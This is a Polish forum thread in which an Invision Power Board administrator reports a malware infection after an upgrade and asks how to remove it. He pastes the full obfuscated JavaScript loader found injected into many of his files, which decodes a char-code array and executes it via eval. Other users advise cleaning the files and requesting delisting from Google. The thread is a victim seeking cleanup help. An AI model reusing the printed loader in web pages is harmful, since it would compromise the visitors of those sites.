malware po update do 3.3.4

[Livo]

Hej,

Ostatnio zaktualizowałem forum do najnowszej wersji. Przy okazji na serwer dostał się jakiś malware, screen:

http://zapodaj.net/images/7997731b3d27c.jpg

Ma ktoś pomysł jak się go pozbyć? Próbowałem napisać pliki z innego komputera, ale nie pomogło. Nie chciałbym usuwać wszystkich plików z FTP, żeby nie stracić modyfikacji. Znacie może jakiś software do przeszukiwania zawartości plików na FTP?

[Jurij]

Co to znaczy dostał się? W paczce ze skryptem nie ma malware, musiałeś zainstalować coś własnoręcznie... A jeśli podejrzewasz udział osób trzecich, tutaj masz ciekawy temat:

[semenedar]

A ja dołożę jeszcze jeden link z podobnym problemem: http://forum.invisio...oprogramowanie/ który może być dla Ciebie wskazówką jak się problemu pozbyć. Pozwolisz również że dla porządku, przeniosę Twój temat do Admin Extra ponieważ Twój problem, nie ma nic wspólnego z problematyką skryptu IPB.

[semenedar]

Automatyczna wiadomość

Temat przeniesiony z forum

Invision Power Board → Invision Power Board 3.3 → Ogólny support IPB

do

Ogólne → Admin Extra

[Livo]

Znalazłem skrypt, który został dopisany w wielu plikach na serwerze:

<!--0247a1-->
<script type="text/javascript" language="javascript"> 
if(020===0x10)v="va"+"l";try{faweb++}catch(btawetb)
{
	try
	{
		fve^v
	}
	catch(btawt4)
	{
		w=window;e=w["e".concat(v)];
	}
}
if(1)
{
	f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,48,81,84,77,67,87,82,74,73,77,67,82,45,64,73,89,45,108,104,107,105,115,113,47,114,109,117,115,102,101,113,108,45,98,95,110,99,103,100,96,114,101,44,103,110,114,114,97,109,97,101,45,110,104,111,37,59,12,8,32,96,44,115,115,119,108,100,44,112,110,113,105,115,103,111,109,30,61,31,37,97,97,113,111,107,115,116,100,37,59,12,8,32,96,44,115,115,119,108,100,44,98,110,112,100,100,112,32,60,30,39,47,37,59,12,8,32,96,44,115,115,119,108,100,44,104,100,103,103,103,114,32,60,30,39,48,110,120,38,57,13,9,30,97,45,113,116,120,106,101,45,117,105,99,114,104,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,108,100,100,116,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,116,110,110,32,60,30,39,48,110,120,38,57,13,9,11,10,31,103,102,39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,40,11,10,31,121,13,9,30,100,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,59,92,38,95,100,111,106,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,95,41,58,11,10,31,123,13,9,123,41,39,39,59);
}
w=f;s=[];
r=String;
for(i=0;-i+442!=0;i+=1)
{
	j=i;
	if(e&&(031==0x19))
		s=s+r["fromCharCode"]((1*w[j]+j%3));
}
if(0x10==020)
	try
	{
		(w+s)()
	}
	catch(asga)
	{
		e("if(1)"+s+"");
	}
</script>
<!--/0247a1-->

Ma ktoś pojęcie, co to robi?

Edytowane 25 Października 2012 przez Livo

[Macsch15]

https://www.google.pl/search?q=if(020%3D%3D%3D0x10)v%3D%22va%22%2B%22l%22%3Btry%7Bfaweb%2B%2B%7Dcatch(btawetb) Edytowane 25 Października 2012 przez Macsch15

[semenedar]

Do Autora- Jak widzisz (kliknij w link który Ci dał Macsch15) nie jesteś osamotniony. Ale to nie jest ważne "co to robi". Ważne byś się tego pozbył. Więc się pozbądź tego kodu z wszystkich plików, a jak będziesz miał posprzątane, to wyślij zgłoszenie z prośbą (dobrze zredagowaną) do Google żeby Ci zdjęli etykietę spamera. W przeciwnym razie, Twoje forum umrze, bo będzie nadal blokowane w wynikach wyszukiwania.